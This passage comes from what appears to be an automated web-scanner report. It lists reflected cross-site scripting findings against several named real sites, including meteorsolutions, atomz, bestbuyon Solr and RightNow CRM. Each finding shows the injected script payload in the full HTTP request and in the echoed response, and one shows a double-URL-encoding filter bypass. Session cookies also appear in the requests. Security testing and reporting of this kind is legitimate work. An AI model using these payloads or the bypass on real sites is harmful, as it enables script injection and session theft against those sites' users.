Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EZr7DxOZ9tRO%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; uid=c24daa55-d689-43c1-bfdf-08ee61c39dda

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 11 Aug 2011 22:51:13 GMT
Etag: "3c0e33681f27b3bc7abb368ce23732a5b7f2abee"
Server: nginx/0.7.65
Content-Length: 180
Connection: keep-alive

meteor.json_query_callback({"url": "http://meme.ms/jx77nf", "id": "197343<script>alert(1)</script>30c35374104", "persist": "http://meme.ms/persist?key=DS7Bc1uIWWoDbZR8AdyVGg"}, 1);

1.207. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/ie8_email

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload d18a5<script>alert(1)</script>d6a4d83a2ea was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FattuverseoffersG2EcomG2FtvG5FhsiG5FbundlesG2FindexG2EphpG3FsendVarG3D20StateG5F49PromoOfferG26sourceG3DECbc0000000WIP00OG26G47UIDG3DDCBB22A7G2DC864G2D41F5G2D960CG2D8BCAF2F5EEA0G26fbidG3DFQXQSI1dYd5G26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=1&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%201)%3Bd18a5<script>alert(1)</script>d6a4d83a2ea HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&GUID=DCBB22A7-C864-41F5-960C-8BCAF2F5EEA0&fbid=FQXQSI1dYd5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EZr7DxOZ9tRO%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; uid=c24daa55-d689-43c1-bfdf-08ee61c39dda

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 11 Aug 2011 22:51:16 GMT
Etag: "3b2ea8990f2f307eca7064c26158c0167d7704e3"
Server: nginx/0.7.65
Content-Length: 180
Connection: keep-alive

meteor.json_query_callback({"url": "http://meme.ms/jx77nf", "id": "1", "persist": "http://meme.ms/persist?key=DS7Bc1uIWWoDbZR8AdyVGg"}, 1);d18a5<script>alert(1)</script>d6a4d83a2ea

1.208. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/track

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 95b5d<script>alert(1)</script>82aca6beb88 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/track?application_id=ee612e29-9b27-4ec8-bbf8-759478dd3755&url_fbid=FQXQSI1dYd5&parent_fbid=&referrer=http%3A%2F%2Fview.atdmt.com%2FCNT%2Fiview%2F286710721%2Fdirect%3Bwi.300%3Bhi.250%2F01%2F4315853561%3Fclick%3Dhttp%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000805773%2Fmnum%3D0000949949%2Fcstr%3D48274349%3D_4e445c22%2C4315853561%2C805773%5E949949%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D48274349%2Foptn%3D64%3Ftrg%3D&location=http%3A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%26GUID%3DDCBB22A7-C864-41F5-960C-8BCAF2F5EEA0%26fbid%3DFQXQSI1dYd5&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B95b5d<script>alert(1)</script>82aca6beb88 HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&GUID=DCBB22A7-C864-41F5-960C-8BCAF2F5EEA0&fbid=FQXQSI1dYd5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EZr7DxOZ9tRO%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; uid=c24daa55-d689-43c1-bfdf-08ee61c39dda

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 11 Aug 2011 22:51:19 GMT
Etag: "c988cdb92e62f59ea9beeb036e903ee08fa90ebf"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Set-Cookie: meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3EFQXQSI1dYd5%3C%3E%3C%3Ehttp%253A%2F%2Fview.atdmt.com%2FCNT%2Fiview%2F286710721%2Fdirect%253Bwi.300%253Bhi.250%2F01%2F4315853561%253Fclick%253Dhttp%253A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%253D0000805773%2Fmnum%253D0000949949%2Fcstr%253D48274349%253D_4e445c22%252C4315853561%252C805773%255E949949%255E1183%255E0%252C1_%2Fxsxdata%253D%2524XSXDATA%2Fbnum%253D48274349%2Foptn%253D64%253Ftrg%253D%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526GUID%253DDCBB22A7-C864-41F5-960C-8BCAF2F5EEA0%2526fbid%253DFQXQSI1dYd5; Domain=.meteorsolutions.com; expires=Fri, 10 Aug 2012 22:51:19 GMT; Path=/
Set-Cookie: uid=c24daa55-d689-43c1-bfdf-08ee61c39dda; Domain=.meteorsolutions.com; expires=Fri, 10 Aug 2012 22:51:19 GMT; Path=/
Content-Length: 174
Connection: keep-alive

meteor.json_query_callback({"parent_id": "", "id": "FQXQSI1dYd5", "uid": "c24daa55\\x2Dd689\\x2D43c1\\x2Dbfdf\\x2D08ee61c39dda"}, 0);95b5d<script>alert(1)</script>82aca6beb88

1.209. http://content.atomz.com/autocomplete/sp10/04/3b/7b/ [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.atomz.com
Path:   /autocomplete/sp10/04/3b/7b/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d15fa<script>alert(1)</script>7b7135fe1a9 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autocomplete/sp10/04/3b/7b/?max_results=200&jsonp=true&callback=preTermSuggCallbackFunctiond15fa<script>alert(1)</script>7b7135fe1a9&query=xs&d=jsonp1314795877616&_=1314795881111 HTTP/1.1
Host: content.atomz.com
Proxy-Connection: keep-alive
Referer: http://www.adobe.com/cfusion/search/index.cfm?loc=en_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 13:05:18 GMT
Content-Type: application/json
Via: 1.1 content.atomz.com:84
X-Cache: MISS from content.atomz.com
Content-Length: 136

preTermSuggCallbackFunctiond15fa<script>alert(1)</script>7b7135fe1a9( [ "security issue sdk-22303: xss in express-install templates" ] )

1.210. http://content.bestbuyon.com/solr/select/ [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.bestbuyon.com
Path:   /solr/select/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1f1bd<script>alert(1)</script>a2d5e472f3f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solr/select/?callback=jsonp13131063158131f1bd<script>alert(1)</script>a2d5e472f3f&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:11:00 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2590
Date: Thu, 11 Aug 2011 23:44:31 GMT
Connection: close

bbyon.ajaxReturnTaxonometricSuccess({
"responseHeader":{
"status":0,
"QTime":0,
"params":{
   "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess",
   "fl":"title,type,ss_type,ss_feature_desc,sis_field
...[SNIP]...
otcom_slot asc,sis_field_yellow_tag_rating desc,created desc",
   "indent":"on",
   "start":"0",
   "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallery",
   "callback":"jsonp13131063158131f1bd<script>alert(1)</script>a2d5e472f3f",
   "qt":"standard",
   "wt":"json",
   "rows":"3"}},
"response":{"numFound":7,"start":0,"docs":[
   {
    "nid":1841,
    "title":"Essential Tablet Accessories",
    "type":"dotcom_symlink",
    "created":"2011-07
...[SNIP]...

1.211. http://content.bestbuyon.com/solr/select/ [fl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.bestbuyon.com
Path:   /solr/select/

Issue detail

The value of the fl request parameter is copied into the HTML document as plain text between tags. The payload 3303d<script>alert(1)</script>b6529cfca94 was submitted in the fl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created3303d<script>alert(1)</script>b6529cfca94&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:20:38 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2482
Date: Thu, 11 Aug 2011 23:44:32 GMT
Connection: close

bbyon.ajaxReturnTaxonometricSuccess({
"responseHeader":{
"status":0,
"QTime":0,
"params":{
   "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess",
   "fl":"title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created3303d<script>alert(1)</script>b6529cfca94",
   "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc",
   "indent":"on",
   "start":"0",
   "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallery",
   "callba
...[SNIP]...

1.212. http://content.bestbuyon.com/solr/select/ [indent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.bestbuyon.com
Path:   /solr/select/

Issue detail

The value of the indent request parameter is copied into the HTML document as plain text between tags. The payload a4c14<script>alert(1)</script>d4c6728b788 was submitted in the indent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=ona4c14<script>alert(1)</script>d4c6728b788&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:20:38 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2590
Date: Thu, 11 Aug 2011 23:44:32 GMT
Connection: close

bbyon.ajaxReturnTaxonometricSuccess({
"responseHeader":{
"status":0,
"QTime":0,
"params":{
   "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess",
   "fl":"title,type,ss_type,ss_feature_desc,sis_field
...[SNIP]...
mage,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created",
   "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc",
   "indent":"ona4c14<script>alert(1)</script>d4c6728b788",
   "start":"0",
   "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallery",
   "callback":"jsonp1313106315813",
   "qt":"standard",
   "wt":"json",
   "rows":"3"}},
"response":{"numFound":7,
...[SNIP]...

1.213. http://content.bestbuyon.com/solr/select/ [json.wrf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.bestbuyon.com
Path:   /solr/select/

Issue detail

The value of the json.wrf request parameter is copied into the HTML document as plain text between tags. The payload 7be8e<script>alert(1)</script>cadeab2043d was submitted in the json.wrf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess7be8e<script>alert(1)</script>cadeab2043d HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:25:00 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2631
Date: Thu, 11 Aug 2011 23:44:33 GMT
Connection: close

bbyon.ajaxReturnTaxonometricSuccess7be8e<script>alert(1)</script>cadeab2043d({
"responseHeader":{
"status":0,
"QTime":0,
"params":{
   "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess7be8e<script>
...[SNIP]...

1.214. http://content.bestbuyon.com/solr/select/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.bestbuyon.com
Path:   /solr/select/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7190a<script>alert(1)</script>c544176858a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess&7190a<script>alert(1)</script>c544176858a=1 HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:20:38 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2599
Date: Thu, 11 Aug 2011 23:44:33 GMT
Connection: close

bbyon.ajaxReturnTaxonometricSuccess({
"responseHeader":{
"status":0,
"QTime":0,
"params":{
   "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess",
   "fl":"title,type,ss_type,ss_feature_desc,sis_field
...[SNIP]...
ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created",
   "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc",
   "indent":"on",
   "7190a<script>alert(1)</script>c544176858a":"1",
   "start":"0",
   "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallery",
   "callback":"jsonp1313106315813",
   "qt":"standard",
   "wt":"json",
   "rows":"3"}},
"response":{"numFound
...[SNIP]...

1.215. http://content.bestbuyon.com/solr/select/ [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.bestbuyon.com
Path:   /solr/select/

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload a1818<script>alert(1)</script>aed90a4ab72 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallerya1818<script>alert(1)</script>aed90a4ab72&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:11:00 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 756
Date: Thu, 11 Aug 2011 23:44:31 GMT
Connection: close

bbyon.ajaxReturnTaxonometricSuccess({
"responseHeader":{
"status":0,
"QTime":1,
"params":{
   "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess",
   "fl":"title,type,ss_type,ss_feature_desc,sis_field
...[SNIP]...
ail,created",
   "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc",
   "indent":"on",
   "start":"0",
   "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallerya1818<script>alert(1)</script>aed90a4ab72",
   "callback":"jsonp1313106315813",
   "qt":"standard",
   "wt":"json",
   "rows":"3"}},
"response":{"numFound":0,"start":0,"docs":[]
}})

1.216. http://crm.rightnow.com/app/utils/simple_create_account/p_sso/http%253A%252F%252Fwww.rightnow.com%252Fsso-thanks.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://crm.rightnow.com
Path:   /app/utils/simple_create_account/p_sso/http%253A%252F%252Fwww.rightnow.com%252Fsso-thanks.php

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15082%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6008e264d60 was submitted in the REST URL parameter 5. This input was echoed as 15082"><script>alert(1)</script>6008e264d60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /app/utils/simple_create_account/p_sso/http%253A%252F%252Fwww.rightnow.com%252Fsso-thanks.php15082%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6008e264d60 HTTP/1.1
Host: crm.rightnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss5ff99%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E6ad8c47ae16
Cookie: s_vi=[CS]v1|272F47EA8501068E-6000010AE03739B6[CE]; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%3B%20s_sq%3D%3B; cp_session=aUj5qWs6mX7AHzwuH9xZilzM5gW_aAO2i3CxmzaEYV2hmNoPxGVae6fY_vANUgSjssEzGCeCTwYfX0A3V_TmZx%7E_FmpBKFdSYBzswHbYrev9E1X5oeZG6fQvLwRI3Zbt1H2cP5aqp5r666b4VcHgIA9%7EIv3fCrCIh2H1itSXqchyPDcYYA_HotVzBmNra6wJ2RvC_FQ9UEgl_Wg2vwA3A1sD6pUObM65EV4%7EyxjIgXnHCFLcX3meK0lJPp4Oo6Rx6seOPLIaCBdDfWJYNiQVrRkTDa8SBwGGzEi50c_EPe1bWSsaCmBGl3I0Jw2JRpS%7ES3TBM1eJsoF7axf4I9IyzyDY%7E4Y_ISVIsUNkijHExCpV1f5g9qj3hjp%7ER0x%7EKyXI3iWkz3aINs4TEbgWtwToTCAVb8Zo0QnJ_A5FmY6KJDdsfh5U3FKQKGCB%7EixV730uEh6nbJSl80NyYcie%7EJZaD%7EZKG05DLEE%7EWBQgcmTC_LPdea9oYk3wt7s3iB80kS%7EAmTxduFNM9KQS00qJBjy8wkJU%7El7xQp8k3lfxWbVlShU%7EP1pWpwmDrpS24d32bEL3nqJYgd%7EKHaQ90pouW1LzynjALbEoPICCRf_Nbvw8XKNKVvHkYZITiK1C7dhp5dOAhhABQ3GjXBrzM%21

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 19:51:55 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUjgwWf50Q1xLfuQgo%7EgaQx%7Ez5TdpY0z2KnfDnOhdfMxduns09TzyLSWGBu3wj%7E0gnqlptSKvBji1YTqxLFlse1sSlsDqZVLtljYE%7EWqACVZDhEQ82TBw9C4UpmFbpIBv5PS%7EYrwXUu7SX9RwuhLcdZYtQWkdnkssANB31ymEHUMpbpE628vEKFeSXePGBBXR3eNUZT0lzIlWTgPpFqd%7EM2wDrR7UiXJi6z02RgU3wjxoMSdctgtqw7RY3Klsuaqf63uwNwf5MJYMZH2GdCzn_wAH0pNU4BBMjMHM5g_wv7Kh76kg6hpFsgMy6ockjOCZsdXuUsAHT%7EWri8V3aqP1Ik16ZgweUYlmHufVAQvh_k1gHlW%7EjbPgS77fRaGQ5bUiLkShVD2aUS_etIGWtaIgIR22V8xo_42GEVVm%7ExfgUp2%7EksOn2GpUH5FoR5JSxWz%7ELlOnM8uOgzZJQDgTvUbQsQFc8W7JQsImRHZDXRlQDh7tUD53%7EBEdBjx1Ba7KpBR25bEIiaNa27hxOhK8ZoM6k_kiRtAqAnC%7EAq6sm5MOUKM5o7I_aCpySd0t2iHc10lUHbFYiFY2OG6KewGJ9sa5Zfi0Q6tKb4JwIDsQKlxVsbbha%7EwXmzCPtOrAoclagzwX7uCEmtW2HK4eWAvnA9jduqVVQ8nhd%7Et2kvUzPLakN%7ExmgoFvZpWOgSnEIY%7EbKqnHG8e22c_IzMSMJZSnxUzr9NoiLq9jEmOZT2AugHyohrxjOgv1MPIsJK_yVeF8PpUqgoptKdp9EbAcTiv6G5ISZhSHcM%7E41VTKkkTw3yRr9fAKlj_49MbcQ4XMdM475TKR6paafRPcZtaabouIn5Pcc8DsSFXic%7EjqYZopA_MH8pngcSFCw5p8zbjmKVrHQ7LoVccJfL88pjb0S%7EXPv5Dr8cFEW01FqvW2Y3LUxVq8urS6KNQeimsha2oVhFbswb4NfKXmNJSij5fwvO3x6ru4kmLuhlbA58nhREVv1H2Kc8sypkDjxUuG56e%7E3obTNp1W521fWhn8ia2bmjpuRWfEuynLNwUIQV_GBFeL8C6BPJkCGjxFSL2kcr9Lre%7Eja02GNZCq5MP_HQNxIpVCuYnPUZIKzOK_Ty8%7E7ZmevqEPLKV0HXHK8EZxfsjp2%7EmDgoR4Pp2rIzGC